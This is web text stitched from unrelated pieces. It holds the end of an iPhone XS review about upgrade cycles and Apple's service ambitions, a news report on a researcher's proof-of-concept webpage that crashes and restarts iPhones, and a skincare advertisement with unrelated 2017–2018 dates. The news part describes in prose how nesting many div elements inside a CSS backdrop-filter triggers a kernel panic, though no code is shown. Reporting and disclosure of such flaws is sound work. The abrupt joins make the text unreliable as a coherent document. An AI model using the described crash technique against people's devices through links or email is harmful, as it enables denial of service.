Every other year for the iPhone I see and hear the same things — that the middle years are unimpressive and not worthy of upgrading. And I get it, money matters, phones are our primary computer and we want the best bang for our buck. This year, as I mentioned at the outset, the iPhone X has created its own little pocket of uncertainty by still feeling a bit ahead of its time.
I don’t kid myself into thinking that we’re going to have an honest discussion about whether you want to upgrade from the iPhone X to iPhone XS or not. You’re either going to do it because you want to or you’re not going to do it because you don’t feel it’s a big enough improvement.
And I think Apple is completely fine with that because iPhone XS really isn’t targeted at iPhone X users at all, it’s targeted at the millions of people who are not on a gesture-first device that has Face ID. I’ve never been one to recommend someone upgrade every year anyway. Every two years is more than fine for most folks — unless you want the best camera, then do it.
And, given that Apple’s fairly bold talk about making sure that iPhones last as long as they can, I think that it is well into the era where it is planning on having a massive installed user base that rents iPhones from it on a monthly or yearly or biennial period. And it doesn’t care whether those phones are on their first, second or third owner, because that user base will need for-pay services that Apple can provide. And it seems to be moving in that direction already, with phones as old as the five-year-old iPhone 5s still getting iOS updates.
With the iPhone XS, we might just be seeing the true beginning of the iPhone-as-a-service era.
A security researcher has found a new way to crash and restart any iPhone — with just a few lines of code.
Sabri Haddouche tweeted a proof-of-concept webpage with just 15 lines of code which, if visited, will crash and restart an iPhone or iPad. Those on macOS may also see Safari freeze when opening the link.
The code exploits a weakness in iOS’ web rendering engine WebKit, which Apple mandates all apps and browsers use, Haddouche told TechCrunch. He explained that nesting a ton of elements — such as <div> tags — inside a backdrop filter property in CSS, you can use up all of the device’s resources and cause a kernel panic, which shuts down and restarts the operating system to prevent damage.
“Anything that renders HTML on iOS is affected,” he said. That means anyone sending you a link on Facebook or Twitter, or if any webpage you visit includes the code, or anyone sending you an email, he warned.
Get The Starter Ritual Set for Normal to Dry Skin Only $59 ($80 Value) at Tatcha.com! While Quantities Last!
Start: 11 Oct 2017 | End: 30 Apr 2018